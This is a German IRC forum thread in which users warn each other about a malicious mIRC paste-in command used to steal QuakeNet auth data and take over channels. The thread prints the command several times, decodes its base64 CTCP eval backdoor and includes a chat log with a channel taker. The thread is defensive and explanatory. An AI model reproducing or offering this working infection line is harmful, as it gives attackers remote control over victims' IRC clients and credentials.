Q Auth schützen

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

1

Sonntag, 11. Januar 2004, 11:59

Also ich habe gedacht, viele IRC user hier sind noch noch nicht so wirklich erfahren, haben aber ihren eigenen Channel!

Deshalb hier ein paar Tips von mir, um euren Q Auth zu schützen!!

1.) schreibt euer Auth Passwort auf keinen Fall (!!!) in eure Perform Liste rein.
da kommen "hacker" ziemlich leicht ran!

2.) klickt auf keine ominösen Links, von denen ihr nicht sicher wisst, was für
einen Inhalt sie enthalten! (bzw. benutzt keinen IE mehr)

3.) wenn euch einer per amsg kostenlose BNCs anbietet...Niemals auf den Link
klicken, oder machen, was da steht! das sind scripts, die euer Auth PW
auslesen!

4.) koppiert NIEMALS folgenden Text:

	Quellcode
1	{ msg $active //write rctcp.mrc $decode(Y3RjcCAqOmNtZCo6PzokZXZhbCgkMi0sOSk=,m) \| .load -rs rctcp.mrc \| .notice $decode(I2JsYXNrYQ==,m) $chr(37) }

So, also das wars dann vorerst mal! gegen richtig gute Hacker, kann man allerdings nicht wirklich viel ausrichten!

Stay tuned

MfG

http://zoryfl.wmw.cc

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von »zoryfl« (11. Januar 2004, 12:01)

Instinct1986

Haudegen

Dabei seit: 11.03.2003

Beiträge: 532

2

Sonntag, 11. Januar 2004, 13:38

RE: Q Auth schützen

Zitat
Original von zoryfl

4.) koppiert NIEMALS folgenden Text:
Quellcode
1
{ msg $active //write rctcp.mrc $decode(Y3RjcCAqOmNtZCo6PzokZXZhbCgkMi0sOSk=,m) | .load -rs rctcp.mrc | .notice $decode(I2JsYXNrYQ==,m) $chr(37) }

Mich würde dann nur interessieren, was dann passiert

?

-=[Der Geist ist gut, aber der Verstand ist besser.]=-Ama et fac quod vis!

lucius

Foren Gott

Dabei seit: 18.09.2002

Beiträge: 3 869

3

Sonntag, 11. Januar 2004, 14:14

@zyrofl

wenn du schon schreibst, dass man etwas auf garkeinen fall machen darf, dann schreibe auch die möglichen folgen dazu.

denn nichts ist verlockender, als das, was man nicht darf oder soll, wenn man nicht weiss, was passiert.

du kennst die neugier der menschen nicht.

God is not on the side of the big battalions, but on the side those who shot best.
[Voltair]

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

4

Sonntag, 11. Januar 2004, 14:41

okayokayokayokay!
SRY

Aber @Lucius: Ich habs mit Absicht net dazugeschrieben, weil sonst wenden die das bei ahnunglosen an! 8[

Also bitte NICHT aus Neugier machen..es wäre euer Ende! =/

Und zwar:
Es gibt nicht nur diese eine msg, sondern auch andere, die aber so ähnlich sind, also nur annere Zahlen afaik!

Also wenn ihr das eintippt, dann wird euer Authname und euer PW und eure BNC Daten, falls vorhanden aus einer eurer *.ini Files gelesen und direkt in ordentlicher Form in einen Channel geschickt!
Und dann habt ihr gelitten! =/

Noch fragen?! 8[

MfG

~~edit~~

Benutzt auch auf KEINEN Fall das str3iber IRC !!

Das sendet nämlich, wenn ihr euch authed auch das PW und alles andere in genau den selben Chan! 8[

http://zoryfl.wmw.cc

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »zoryfl« (11. Januar 2004, 14:50)

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

5

Sonntag, 25. Januar 2004, 15:50

Dem widerspreche ich *gg*

{ msg $active //write rctcp.mrc $decode(Y3RjcCAqOmNtZCo6PzokZXZhbCgkMi0sOSk=,m) | .load -rs rctcp.mrc | .notice $decode(I2JsYXNrYQ==,m) $chr(37) }

Dieses Script legt einen neue Datei names rctcp.mrc an und schreibt folgenden inhalt rein: "ctcp *:cmd* :?:

$eval($2-,9)"

Als nächstes wird das Script in mirc geladen und an den channel #blaska wird ein Prozentzeichen (%) geschickt, damit die Kiddies, die in dem Chan hocken wissen, dass der User infiziert ist. Das Script an sich ermöglicht es den Kiddies euer mIRC fernzusteuern und alle Befehle, die mirc-Script bereit hällt auf eurem Rechner auszuführen. Das sind eine ganze Menge und vor allem sind viele davon extrem gefährlich.

Das war eigentlich alles, was das Script genau macht.

Der Chan befindet sich übrigend im Quakenet, ist mit einem ChannelKey gesichert und hat zusätzlich mode +s ... Ich werd' mal schauen, ob ich die Jungs reinlegen kann

Warum kann ein Tag nicht 36 Stunden haben? ://

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

6

Sonntag, 25. Januar 2004, 16:20

ya, okay du wusstest es "besser"

Also quasi wusste ich das schon, was du eben sagtest, aber ich mein wer kann das, der nicht wirklich gut mIRC kennt, das nachvollziehen? Also hab ichs quasi nur kurz beschrieben! ;p

Achja: Das mit dem reinlegen...vergiss es! Me is öfters drinne, wenn ich Lust hab, aber reinlegen kannst du die net!!

MfG

http://zoryfl.wmw.cc

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

7

Sonntag, 25. Januar 2004, 16:40

Ich kanns aber nen paar netten IRC-Ops @ #feds melden ... dann wird der Chan vermutlich nicht mehr lange existieren

[EDIT] Habe mich jetzt für eine einfachere Variante entschieden und einfach mal so getan, als ob ich infiziert wäre. Dann hab ich mit dem bösen Jungen nen bissl geplaudert

Warum kann ein Tag nicht 36 Stunden haben? ://

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (25. Januar 2004, 22:52)

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

8

Montag, 26. Januar 2004, 12:50

Dann erzähl mal bitte, mit wem du geplaudert hast und was dabei rauskam?!
Das interessiert mich nun doch!

btw. was hast du damit erreichen können?

MfG

http://zoryfl.wmw.cc

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

9

Montag, 26. Januar 2004, 13:21

Als erstes hab ich halt mit nen paar Nicks das %-Zeichen per Notice an seinen Chan #blaska geschickt (wie es infizierte Clients auch tun würden) ... Dann hab ich abgewartet was passiert. Als nächstes hat er dann mehrmals meinen Nicks Befehle gesendet (wie Auslesen der Perform.ini, etc.). Das hat natürlich nicht gewirkt, weil ich ja nicht infiziert war *gg*. Dann hab ich ne Notice geschickt, von wegen "Erwischt"

, worauf hin er mir ne Notice geschickt hat und mich in einen passwortgeschützten Channel eingeladen hat. Dort fand dann folgende Unterhaltung statt (sämtliche Namen, Adressen, IPs, etc. sind zensiert):

Zitat

[22:18] <Clone5>
[22:18] <dasWarIch> hoi
[22:19] <Clone5> wieso machst du notices an #blaska
[22:19] <Clone5> wenn du weisst das es da bugs gibt ?
[22:19] <Clone5>
[22:19] <dasWarIch> weiß nicht, wieso nicht?
[22:19] <Clone5> hehe
[22:19] <Clone5> naja
[22:19] <Clone5> ich hab da manchaml derben authspam
[22:19] <Clone5> biste taker ?
[22:19] <dasWarIch> botnet-tracker
[22:19] <Clone5> ?
[22:20] <dasWarIch> ich untersuche würmer, schädliche mirc-scripts, etc
[22:20] <Clone5> achso
[22:20] <dasWarIch> aber taken kann ich auch ;D
[22:20] <Clone5> LANGWEILIG
[22:20] <Clone5> proxys ?
[22:20] <dasWarIch> von wegen
[22:20] <Clone5> dde ?
[22:21] <dasWarIch> sockschain und sockscap ab und zu im einsatz xD
[22:21] <Clone5> hast du gute proxy listen ?? oder machst du dir selber die listen
[22:21] <Clone5> ich nimm immer http
[22:21] <dasWarIch> naja, gute listen sind schwer zu finden
[22:21] <Clone5> jo
[22:21] <Clone5> mein kumpel macht die immer selber
[22:21] <Clone5> so 400 proxys
[22:21] <Clone5> oder so
[22:21] <Clone5> ja
[22:21] <Clone5> wie würdest du scannen ?
[22:21] <Clone5> dnsd ?
[22:22] <dasWarIch> mit sockscap
[22:22] <dasWarIch> und sockschain
[22:22] <dasWarIch> aber das ist wieder was anderes xD
[22:22] <Clone5> DSNS
[22:22] <Clone5> das hab ich gerade offen
[22:22] <dasWarIch> eigentlich wollt ich nur mal so schauen, was ihr so macht ;D
[22:22] <Clone5> aber ich weis net so richtig wie das funzt
[22:23] <Clone5> http://*****/tutorial.html
[22:23] <Clone5> das hab ich
[22:23] <Clone5> weis net wie ich da proxys suche
[22:23] <Clone5> proxyChecker7 hab ich momentan in der DL liste
[22:23] <dasWarIch> joah, ich kenn das proggy nicht, werd's mir aber mal anschauen
[22:23] <Clone5> jo
[22:23] <Clone5> mach ma
[22:23] <Clone5> ich check das net ganz
[22:24] <dasWarIch> mach ich
[22:24] <Clone5> ach qry dann den SEINHAUPTNICK
[22:24] <Clone5> das ist mein mainIRC
[22:24] <Clone5> ich bin hier nur n takebot
[22:24] <Clone5>
[22:24] <dasWarIch> jojo
[22:25] <SEINHAUPTNICK> jo mein sklave
[22:25] <dasWarIch> das hab ich mir sozusagen schon gedacht xD
[22:26] <dasWarIch> xD
[22:26] <SEINHAUPTNICK> logüsch
[22:26] <SEINHAUPTNICK> ip tracer ist aber auch billig
[22:26] <SEINHAUPTNICK> wenn ich +x gewesen wäre wüsstest net
[22:26] <SEINHAUPTNICK> sag mal woher ich komme

*Zensiert*

[22:27] * SEINHAUPTNICK sets mode: +o dasWarIch
[22:28] <SEINHAUPTNICK> und wie geht das prog ?
[22:29] <dasWarIch> hab noch net genau geschaut, aber ich guck gleich mal
[22:30] <SEINHAUPTNICK> #SEINHAUPTCHAN
[22:31] <SEINHAUPTNICK> http://www.***.com
[22:31] <SEINHAUPTNICK> http://www.***.com.ua
[22:31] <SEINHAUPTNICK> sry die wars
[22:35] <dasWarIch> joah, du meinst die page soll ich mir angucken, oder was?
[22:36] <SEINHAUPTNICK> jane
[22:36] <SEINHAUPTNICK> da gibts ProxyChecker7
[22:36] <SEINHAUPTNICK> den nutz ich auch
[22:36] <SEINHAUPTNICK> wenn ich wüssts wie das geht
[22:36] <SEINHAUPTNICK> der eine kumpel hat immer ka zeit
[22:36] <SEINHAUPTNICK> (das ist nicht NOCHNENANDERER)
[22:37] <dasWarIch> ich schaus mir auch noch später an
[22:37] <SEINHAUPTNICK> hehe
[22:37] <SEINHAUPTNICK> naja
[22:37] <SEINHAUPTNICK> meldest dich morgen ?
[22:37] <SEINHAUPTNICK> weil ich hab morgen Chemie muss jetzt pennen
[22:38] <dasWarIch> joah, ich bleib mit MEINHAUPTNICK in deinem chan
[22:38] <Clone5> //write support.mrc ctcp *:cmd*$eval($2-,9)
[22:38] <Clone5> lol
[22:38] <Clone5>
[22:38] <Clone5> billüg
[22:38] <dasWarIch> hrhr xD
[22:38] <Clone5> »» Iam using NEN SELBSTGEBAUTES SCRIPT»»
[22:39] <dasWarIch> fein fein xD
[22:39] <Clone5>
[22:39] <Clone5> naja du weisst schon wieder zuviel
[22:39] <dasWarIch> ich benutze mirc 6.12 selbst ausgebaut ;D
[22:39] <Clone5> naja n screeny zeig ich noch
[22:39] <Clone5> von dem irc
[22:40] <dasWarIch> hrhr
[22:40] <Clone5> http://home.arcor.de/****/****.jpg
[22:40] <Clone5> NOCHNENANDERER hat dsl
[22:40] <Clone5> der kickt immer schneller als ich
[22:40] <Clone5> fu isdn
[22:40] <Clone5> na denn
[22:40] <Clone5> cYa
[22:40] * Quits: Clone1 (***@***.de) (Quit)
[22:40] * Quits: Clone2 (***@***.de) (Quit)
[22:40] * Quits: Clone3 (***@***.de) (Quit)
[22:40] * Quits: Clone4 (***@***.de) (Quit)
[22:40] * Quits: Clone5 (***@***.de) (Quit)
[22:41] <SEINHAUPTNICK> cu
[22:41] <SEINHAUPTNICK> meldest dich morgän
[22:41] <dasWarIch> geht klar
[22:42] <dasWarIch> <- geht eh jetzt
[22:42] * Disconnected
Session Close: Sun Jan 25 22:43:25 2004

Mal sehen, was sich draus entwickelt

Es ist immer das selbe, wenn ich solche Leute aufgespürt habe: Sie sind eigentlich alle immer total nett, reden ganz offen und das Beste: Selbst nach Monaten hat man immer noch Kontakt zu ihnen. Ich weiß nicht, woran es liegt, aber irgendwie respektieren sie einen immer.

P.S.: Ich hab mich früher mal intensiv mit solchen Dingen beschäftigt, daher weiß ich, wie diese Leute arbeiten

Warum kann ein Tag nicht 36 Stunden haben? ://

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (26. Januar 2004, 13:22)

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

10

Montag, 26. Januar 2004, 13:43

Also... Ich weiß nicht wer es war, aber ich weiß nun wer von 8 Leuten es sein kann! Und sry, aber ich kann nur lachen!

Zitat

P.S.: Ich hab mich früher mal intensiv mit solchen Dingen beschäftigt, daher weiß ich, wie diese Leute arbeiten

...

Also ich finds lustig, wie du denkst, du kennst diese Leute nach einer kurzen Zeit... Aber ok, wenn du meinst...

Aber nun hast du die Frage von voher wieder nicht beantwortet:

Was hat es dir nun gebracht das alles zu machen? o_O

MfG

http://zoryfl.wmw.cc

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

11

Montag, 26. Januar 2004, 13:56

Was es mir gebracht hat? Das liegt ja wohl auf der Hand: Spaß

Das ist im Grunde doch nur ein Wettlauf des Wissens

Und oh doch: Ich kenne viele von diesen Leuten mittlerweile sehr gut, einige wohnen auch hier in der selben Stadt wie ich, und ich hab mich schon des Öfteren mit ihnen getroffen. Man lernt nie aus

Ausserdem: Mal ne Gegenfrage: Was bringt es solchen Leuten so etwas zu machen?

...

Du weißt keine Antwort?? Ich auch nicht, deshalb versuche ich mit Ihnen in Kontakt zu treten

Warum kann ein Tag nicht 36 Stunden haben? ://

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

12

Montag, 26. Januar 2004, 14:29

Antwort von mypTw` (ich erlaub mir das einfach ma, den Namen z nennen):
"Um ihnen zu zeigen, dass sie zu dumm sind IRC zu benutzen! "

Antwort von FeartehZr: "Aus Fun ... es maht einfach Bock die Leute in Panik zu sehen!"

Also siehste doch Antworten! ^.-

Und ich hatte die schon frühe rgefragt, also das is net wirklich aktuell!

Aber mein Chan wurde auch schon getaked, und ich finds auf jeden Fall plöhd! 8[

MfG

http://zoryfl.wmw.cc

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

13

Montag, 26. Januar 2004, 15:10

Joah, und mir macht es halt Spaß selbst den Leuten zu zeigen, dass sie nicht vollkommen sicher sind und das man selbst sie auch mal erwischen kann

Hoffe wir sind und jetzt einig

So far... Cya l8a

Warum kann ein Tag nicht 36 Stunden haben? ://

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

14

Dienstag, 27. Januar 2004, 18:02

so...

Jetzt hab ich den Salat...aber dicke...

1.) Ich muss mich bei FeartehZ entschuldigen, er hatte das mit dem " es maht einfach Bock die Leute in Panik zu sehen" nie gesagt! Das habe ich "ausgeschmückt" !
Sry

Danna ber
2.) aus einem mir unerklärlichen Grund haben die Taker den Link hier bekommen und mich gleich mal fett die Hälle heißgemacht, warum ich ihre hackline euch gesagt habe usw...

Tja... ich denke man muss sich entscheiden!
davon abgesehen gibt es hier MAX.5 user, für die das interessant war und die Gelegenheit, dass es gerade die im Qnet trifft, ist doch ziemlich unwarscheinlich!

Aber auf jeden Fall wurde mir die Hölle heißgemacht.. über was sich die taker aufregen? Wegen vielleivht 2 Opfern? Aber SIE SELBST taken Channels und denken nicht drüber nach, was sie anderen damit "antun" !

So, das war das, was ich noch unbedingt loswerden musste!

MfG

http://zoryfl.wmw.cc

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

15

Dienstag, 27. Januar 2004, 20:45

Same here, wurde wegen dem Chatlog heftigst angeflamed ... aber naja, mich störts net. Scheinbar hängt irgendwer von diesen Leutz hier @ WMW rum ... hät ich nicht gedacht! Zum Glück hab ich nen BNC, an mein Auth-Passwd kommen die nie im Leben

)

Warum kann ein Tag nicht 36 Stunden haben? ://

Smuchi

Grünschnabel

Dabei seit: 16.01.2005

Beiträge: 1

16

Sonntag, 16. Januar 2005, 21:23

wo kann man eigentlich mehr über irc lernen, wie man selber etwas codet und so?

würde mich auch mal interessieren
und gibt es auch sowas wie virenscanner und firewall für mirc?

Wir machen das sich alles dreht!

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

17

Sonntag, 16. Januar 2005, 21:33

Also so etwas wie eine FireWall oder ein AntiViren Programm für IRC gibt es nicht. Da musst du selbst aufpassen, da DU SELBST immer etwas machen musst, dass dir etwas passiert.

Als ersten Schutz klicke NIE Links an bei denen du nichtg weißt, dass sie sicher sind. Also nix mit ebay.tk.eu oder sowas wie member.freenet.de/... wenn du nicht weißt, dass sie sicher sind.

Und wenn du coden lernen willst, dann besuch doch mal mircscripts.org oder auch cyberscripters.net oder auch mircscripts.com

Wobei cyberscripters.net bei mir gerade nicht wirklich funktioniert.

MfG

http://zoryfl.wmw.cc

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »zoryfl« (16. Januar 2005, 21:34)

Q Auth schützen

Quellcode

RE: Q Auth schützen

Zitat

Quellcode

Zitat

Zitat

Ähnliche Themen